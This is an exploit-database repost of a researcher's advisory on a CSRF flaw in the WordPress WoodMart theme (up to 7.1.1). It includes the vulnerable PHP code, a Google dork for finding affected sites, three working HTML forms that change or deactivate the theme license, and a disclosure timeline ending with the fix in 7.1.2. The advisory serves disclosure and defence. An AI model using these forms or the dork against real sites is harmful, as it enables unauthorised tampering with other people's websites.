0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress WoodMart Theme 7.1.1 Cross Site Request Forgery Vulnerability
[==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2023 ] ==
Report Title: WordPress WoodMart Theme <= 7.1.1 - Theme License Options Change via CSRF
Google Dork: inurl:/wp-content/themes/woodmart/
Research Date: 2023-02-10
Researcher: FearZzZz [ https://fearzzzz.ru ]
Component Vendor: XTemos [ https://themeforest.net/user/xtemos ]
Vulnerable Version: <= 7.1.1
Component Link: https://themeforest.net/item/woodmart-woocommerce-wordpress-theme/20264492
CVSS Base Score: 5.4 (Medium)
CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L
OWASP Top 10: A01: 2021 – Broken Access Control
CWE: CWE-352
CVE: TBA
=================================================================================================
#### [ Description: ]
The WoodMart theme for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, v7.1.1, because of missing nonce validation on the 'process_form' function. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication.
#### [ Vulnerable Code: ]
File #0: ~/woodmart/inc/classes/License.php, lines: 134-143.
```
if ( isset( $_POST['purchase-code-deactivate'] ) ) {
$this->deactivate();
$this->_notices->add_success( 'Theme license is successfully deactivated.' );
return;
}
if ( isset( $_POST['woodmart-purchase-code'] ) && ( ! isset( $_POST['agree_stored'] ) || empty( $_POST['agree_stored'] ) ) ) {
$this->_notices->add_error( 'You must agree to store your purchase code and user data by xtemos.com' );
return;
}
```
#### [ Impact: ]
Impact of a CSRF vulnerability is related to the privileges of the target user. Depending on the nature of the action, an attacker might be able to change some data or gain full control over the user's account. If the compromised user has a privileged role (administrator, i.e.) within the application, then the attacker can gain full control over the application.
#### [ Proof-of-Concept: ]
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://fearzzzz.ru/wp-admin/admin.php?page=xts_dashboard&tab=wizard&step=activation" method="POST">
<input type="hidden" name="purchase-code" value="Z" />
<input type="hidden" name="agree_stored" value="on" />
<input type="hidden" name="woodmart-purchase-code" value="Activate theme" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://fearzzzz.ru/wp-admin/admin.php?page=xts_license" method="POST">
<input type="hidden" name="purchase-code" value="Z" />
<input type="hidden" name="agree_stored" value="on" />
<input type="hidden" name="woodmart-purchase-code" value="Activate theme" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://fearzzzz.ru/wp-admin/admin.php?page=xts_license" method="POST">
<input type="hidden" name="purchase-code-deactivate" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
#### [ Timeline: ]
2023.02.10 - Vulnerability has been discovered.
2023.02.13 - WoodMart Theme v7.1.0 released.
2023.02.14 - WoodMart Theme v7.1.1 released.
2023.02.14 - Vendor notified, received a quick response.
2023.02.14 - All the details was addressed to Envato and Patchstack. CVE ID requested.
2023.02.15 - WoodMart Theme v7.1.2 released, the vulnerability has been fixed.
#### [ Contacts: ]
Website: fearzzzz.ru
Email: fearzzzz@tutanota.com
Twitter: https://twitter.com/fear_zzzz
Medium: https://fearzzzz.medium.com
GitHub: https://github.com/fearzzzz
YouTube: https://youtube.com/@fearzzzz
#### [ Notes: ]
Special thanks to Mikhail Kobzarev (https://t.me/mihdan | https://wp-digest.com) for providing the original theme files.
Additional greetings to Kailoon (ThemeForest Senior Reviewer, https://kailoon.com) and XTemos Studio (https://themeforest.net/user/xtemos) for the prompt response.
# 0day.today [2024-11-16] #